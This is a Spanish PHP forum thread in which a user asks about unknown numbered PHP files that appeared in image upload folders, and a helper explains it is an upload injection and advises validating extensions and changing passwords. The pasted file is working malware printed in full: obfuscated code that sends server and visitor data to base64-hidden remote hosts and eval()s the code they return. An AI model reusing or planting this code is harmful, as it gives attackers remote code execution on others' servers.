Foros del Web » Programando para Internet » PHP »

archivos estraños en carpetas de imagenes

Estas en el tema de archivos estraños en carpetas de imagenes en el foro de PHP en Foros del Web. Hola, estoy subiendo imagenes a una carpeta del servidor por metodo copy de php y me he encontrado con la solpresa de encontrar un php ...
  #1 (permalink)  
Antiguo 22/03/2011, 03:56
 
Fecha de Ingreso: marzo-2011
Ubicación: Sabadell Barcelona
Mensajes: 3
Antigüedad: 13 años, 1 mes
Puntos: 0
archivos estraños en carpetas de imagenes

Hola, estoy subiendo imagenes a una carpeta del servidor por metodo copy de php y me he encontrado con la solpresa de encontrar un php que yo no he generado (en cada una de las carpetas de imagenes)

el archivo adopta el nombre de números y este es el contenido :


<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=
(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_
USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".bas e64_encode($c).".".base64_encode($d).".".base64_en code($e).".".base64_encode($f).".".base64_encode($ g).".".base64_encode($h).".e.".base64_encode($i)." .".base64_encode($j);$f=base64_decode("cnNzbmV3cy5 3cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="15055816d889249af01730b011312fb7") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLz dhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzc u").$f.$z))eval($c);else{$cu=curl_init(base64_deco de("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURL OPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close ($cu);eval($o);};die(); ?>

¿de que se trata? ¿me estan hackeando? disculpen mi ignorancia y gracias
  #2 (permalink)  
Antiguo 22/03/2011, 09:18
Avatar de maycolalvarez
Colaborador
 
Fecha de Ingreso: julio-2008
Ubicación: Caracas
Mensajes: 12.120
Antigüedad: 15 años, 8 meses
Puntos: 1532
Respuesta: archivos estraños en carpetas de imagenes

efectivamente, tienes un caso de inyecciones de upload, en tu código en donde gestionas los uploads es imprescindible que valides la extensión del archivo.

también puede ser que tengas que cambiar la clave del FTP, base de datos y toda clave, porque el código anterior no se ve nada bueno....
__________________
¡Por favor!: usa el highlight para mostrar código
El que busca, encuentra...

Etiquetas: carpetas, imagenes
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 22:02.